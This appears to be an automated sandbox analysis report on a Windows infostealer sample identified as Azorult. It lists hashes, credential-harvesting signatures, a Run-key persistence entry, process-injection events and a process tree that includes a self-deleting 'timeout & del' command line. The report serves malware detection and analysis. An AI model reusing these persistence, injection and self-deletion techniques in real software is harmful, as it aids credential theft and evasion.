Analysis
max time kernel: 150s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 04-06-2024 11:22

Static task: static1
Behavioral task: behavioral1
  Sample: IMG_1005752333.exe
  Resource: win7-20240215-en
Behavioral task: behavioral2
  Sample: IMG_1005752333.exe
  Resource: win10v2004-20240508-en

General
Target: IMG_1005752333.exe
Size: 219KB
MD5: 8816d5e592685626fbbfdb1b1b309d79
SHA1: 650de5fc16a287c7801742ec92a2cc1ae7fcf4e8
SHA256: d1832886bd31bf7129fbd708123c19bbc633e4c12bde2affabbf69236f38afad
SHA512: 323dcf2b6de01767912a05abb93f97c12667b450ad97274babdb8b58248b36c6578e249aec1066bb8afe9568fe450e54795458149d53b71204e312bb8c90bf7f
SSDEEP: 3072:8OJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wD:5H10CtAbe
Malware Config
Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 1036 created 612 | 1036 | powershell.EXE | 5

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | $777e8b2c

Executes dropped EXE (2 IoCs)
  pid | Process
  820 | $77c6dd89
  752 | $777e8b2c

Loads dropped DLL (4 IoCs)
  pid | Process
  752 | $777e8b2c (4 identical entries)

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads local data of messenger clients (2 TTPs)
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | $777e8b2c
  Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | $777e8b2c
  Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | $777e8b2c

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Ygoev = "C:\\Users\\Admin\\AppData\\Roaming\\$77Ygoev.exe" | IMG_1005752333.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Drops file in System32 directory (14 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | svchost.exe
  File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | svchost.exe
  File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | svchost.exe
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
  File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE

Suspicious use of SetThreadContext (3 IoCs)
  description | pid | Process | procid_target
  PID 5064 set thread context of 820 | 5064 | IMG_1005752333.exe | 92
  PID 1036 set thread context of 4784 | 1036 | powershell.EXE | 95
  PID 5064 set thread context of 752 | 5064 | IMG_1005752333.exe | 96

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | $777e8b2c
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | $777e8b2c

Delays execution with timeout.exe (1 IoC)
  pid | Process
  1048 | timeout.exe
Modifies data under HKEY_USERS (64 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={7EFE0617-D683-4C35-884A-21AB35BE4EA0}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | OfficeClickToRun.exe
  Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | OfficeClickToRun.exe
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1717500219" | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | OfficeClickToRun.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | powershell.EXE
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.EXE
  Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | svchost.exe
  Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | svchost.exe
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.EXE
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  1036 | powershell.EXE (3 identical entries)
  4784 | dllhost.exe (61 identical entries)
Suspicious use of AdjustPrivilegeToken (12 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 5064 | IMG_1005752333.exe
  Token: SeDebugPrivilege | 1036 | powershell.EXE
  Token: SeDebugPrivilege | 1036 | powershell.EXE
  Token: SeDebugPrivilege | 4784 | dllhost.exe
  Token: SeDebugPrivilege | 5064 | IMG_1005752333.exe
  Token: SeShutdownPrivilege | 376 | dwm.exe
  Token: SeCreatePagefilePrivilege | 376 | dwm.exe
  Token: SeTcbPrivilege | 672 | lsass.exe
  Token: SeShutdownPrivilege | 3516 | Explorer.EXE
  Token: SeCreatePagefilePrivilege | 3516 | Explorer.EXE
  Token: SeShutdownPrivilege | 376 | dwm.exe
  Token: SeCreatePagefilePrivilege | 376 | dwm.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 5064 wrote to memory of 820 | 5064 | IMG_1005752333.exe | 92 (9 identical entries)
  PID 1036 wrote to memory of 4784 | 1036 | powershell.EXE | 95 (8 identical entries)
  PID 4784 wrote to memory of 612 | 4784 | dllhost.exe | 5
  PID 4784 wrote to memory of 672 | 4784 | dllhost.exe | 7
  PID 4784 wrote to memory of 964 | 4784 | dllhost.exe | 12
  PID 4784 wrote to memory of 376 | 4784 | dllhost.exe | 13
  PID 4784 wrote to memory of 508 | 4784 | dllhost.exe | 14
  PID 4784 wrote to memory of 932 | 4784 | dllhost.exe | 15
  PID 4784 wrote to memory of 1088 | 4784 | dllhost.exe | 17
  PID 4784 wrote to memory of 1100 | 4784 | dllhost.exe | 18
  PID 4784 wrote to memory of 1148 | 4784 | dllhost.exe | 19
  PID 4784 wrote to memory of 1176 | 4784 | dllhost.exe | 20
  PID 4784 wrote to memory of 1284 | 4784 | dllhost.exe | 21
  PID 4784 wrote to memory of 1340 | 4784 | dllhost.exe | 22
  PID 4784 wrote to memory of 1352 | 4784 | dllhost.exe | 23
  PID 4784 wrote to memory of 1392 | 4784 | dllhost.exe | 24
  PID 4784 wrote to memory of 1516 | 4784 | dllhost.exe | 25
  PID 4784 wrote to memory of 1540 | 4784 | dllhost.exe | 26
  PID 4784 wrote to memory of 1564 | 4784 | dllhost.exe | 27
  PID 4784 wrote to memory of 1680 | 4784 | dllhost.exe | 28
  PID 4784 wrote to memory of 1696 | 4784 | dllhost.exe | 29
  PID 4784 wrote to memory of 1760 | 4784 | dllhost.exe | 30
  PID 4784 wrote to memory of 1788 | 4784 | dllhost.exe | 31
  PID 4784 wrote to memory of 1828 | 4784 | dllhost.exe | 32
  PID 4784 wrote to memory of 1944 | 4784 | dllhost.exe | 33
  PID 4784 wrote to memory of 1952 | 4784 | dllhost.exe | 34
  PID 4784 wrote to memory of 1996 | 4784 | dllhost.exe | 35
  PID 4784 wrote to memory of 1144 | 4784 | dllhost.exe | 36
  PID 4784 wrote to memory of 2080 | 4784 | dllhost.exe | 37
  PID 4784 wrote to memory of 2096 | 4784 | dllhost.exe | 38
  PID 4784 wrote to memory of 2236 | 4784 | dllhost.exe | 40
  PID 4784 wrote to memory of 2288 | 4784 | dllhost.exe | 41
  PID 4784 wrote to memory of 2464 | 4784 | dllhost.exe | 42
  PID 4784 wrote to memory of 2472 | 4784 | dllhost.exe | 43
  PID 4784 wrote to memory of 2616 | 4784 | dllhost.exe | 44
  PID 4784 wrote to memory of 2632 | 4784 | dllhost.exe | 45
  PID 4784 wrote to memory of 2756 | 4784 | dllhost.exe | 46
  PID 4784 wrote to memory of 2768 | 4784 | dllhost.exe | 47
  PID 4784 wrote to memory of 2776 | 4784 | dllhost.exe | 48
  PID 4784 wrote to memory of 2828 | 4784 | dllhost.exe | 49
  PID 4784 wrote to memory of 2852 | 4784 | dllhost.exe | 50
  PID 4784 wrote to memory of 2880 | 4784 | dllhost.exe | 51
  PID 4784 wrote to memory of 2908 | 4784 | dllhost.exe | 52
  PID 4784 wrote to memory of 3168 | 4784 | dllhost.exe | 53
  PID 4784 wrote to memory of 3420 | 4784 | dllhost.exe | 55
  PID 4784 wrote to memory of 3516 | 4784 | dllhost.exe | 56
  PID 4784 wrote to memory of 3660 | 4784 | dllhost.exe | 57
  PID 4784 wrote to memory of 3840 | 4784 | dllhost.exe | 58
  PID 4784 wrote to memory of 3988 | 4784 | dllhost.exe | 60
outlook_office_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | $777e8b2c

outlook_win_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | $777e8b2c
Processes
(one entry per process: [nesting depth] image path | command line, followed by its signature hits and PID, indented by depth)

[1] C:\Windows\system32\winlogon.exe | winlogon.exe
    PID: 612
  [2] C:\Windows\system32\dwm.exe | "dwm.exe"
      - Suspicious use of AdjustPrivilegeToken
      PID: 376
  [2] C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{d98d7404-1429-4bfd-a5c2-4f14d0acc630}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 4784
[1] C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe
    - Suspicious use of AdjustPrivilegeToken
    PID: 672
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
    PID: 964
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
    PID: 508
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
    PID: 932
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
    PID: 1088
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
    PID: 1100
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
    PID: 1148
  [2] C:\Windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
      PID: 2776
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "<heavily obfuscated PowerShell command line, omitted>"
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1036
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
    - Drops file in System32 directory
    PID: 1176
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
    PID: 1284
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
    PID: 1340
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
    PID: 1352
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
    PID: 1392
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
    PID: 1516
  [2] C:\Windows\system32\sihost.exe | sihost.exe
      PID: 2616
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
    PID: 1540
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
    PID: 1564
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
    PID: 1680
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
    PID: 1696
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
    PID: 1760
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
    PID: 1788
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 1828
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
    PID: 1944
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
    PID: 1952
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
    PID: 1996
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
    PID: 1144
[1] C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe
    PID: 2080
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
    PID: 2096
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
    PID: 2236
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
    PID: 2288
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
    PID: 2464
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
    PID: 2472
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
    PID: 2632
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
    PID: 2756
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID: 2768
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
    PID: 2828
[1] C:\Windows\sysmon.exe | C:\Windows\sysmon.exe
    PID: 2852
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
    PID: 2880
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
    PID: 2908
[1] C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID: 3168
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
    PID: 3420
[1] C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE
    - Suspicious use of AdjustPrivilegeToken
    PID: 3516
  [2] C:\Users\Admin\AppData\Local\Temp\IMG_1005752333.exe | "C:\Users\Admin\AppData\Local\Temp\IMG_1005752333.exe"
      - Adds Run key to start application
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 5064
    [3] C:\Users\Admin\AppData\Local\Temp\$77c6dd89 | "C:\Users\Admin\AppData\Local\Temp\$77c6dd89"
        - Executes dropped EXE
        PID: 820
    [3] C:\Users\Admin\AppData\Local\Temp\$777e8b2c | "C:\Users\Admin\AppData\Local\Temp\$777e8b2c"
        - Checks computer location settings
        - Executes dropped EXE
        - Loads dropped DLL
        - Accesses Microsoft Outlook profiles
        - Checks processor information in registry
        - outlook_office_path
        - outlook_win_path
        PID: 752
      [4] C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "$777e8b2c"
          PID: 2300
        [5] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            PID: 4308
        [5] C:\Windows\SysWOW64\timeout.exe | C:\Windows\system32\timeout.exe 3
            - Delays execution with timeout.exe
            PID: 1048
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
    PID: 3660
[1] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    PID: 3840
[1] C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
    PID: 3988
[1] C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
    PID: 3532
[1] C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding
    PID: 4740
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
    PID: 3752
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
    PID: 2440
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
    - Modifies data under HKEY_USERS
    PID: 3228
[1] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID: 452
[1] C:\Windows\system32\SppExtComObj.exe | C:\Windows\system32\SppExtComObj.exe -Embedding
    PID: 3952
[1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
    PID: 4008
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
    PID: 448
[1] C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    PID: 1736
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    PID: 4888
[1] C:\Windows\system32\wbem\wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    PID: 5060
[1] C:\Windows\servicing\TrustedInstaller.exe | C:\Windows\servicing\TrustedInstaller.exe
    PID: 1320
[1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
    PID: 2092
[1] C:\Windows\System32\mousocoreworker.exe | C:\Windows\System32\mousocoreworker.exe -Embedding
    PID: 4584
Network
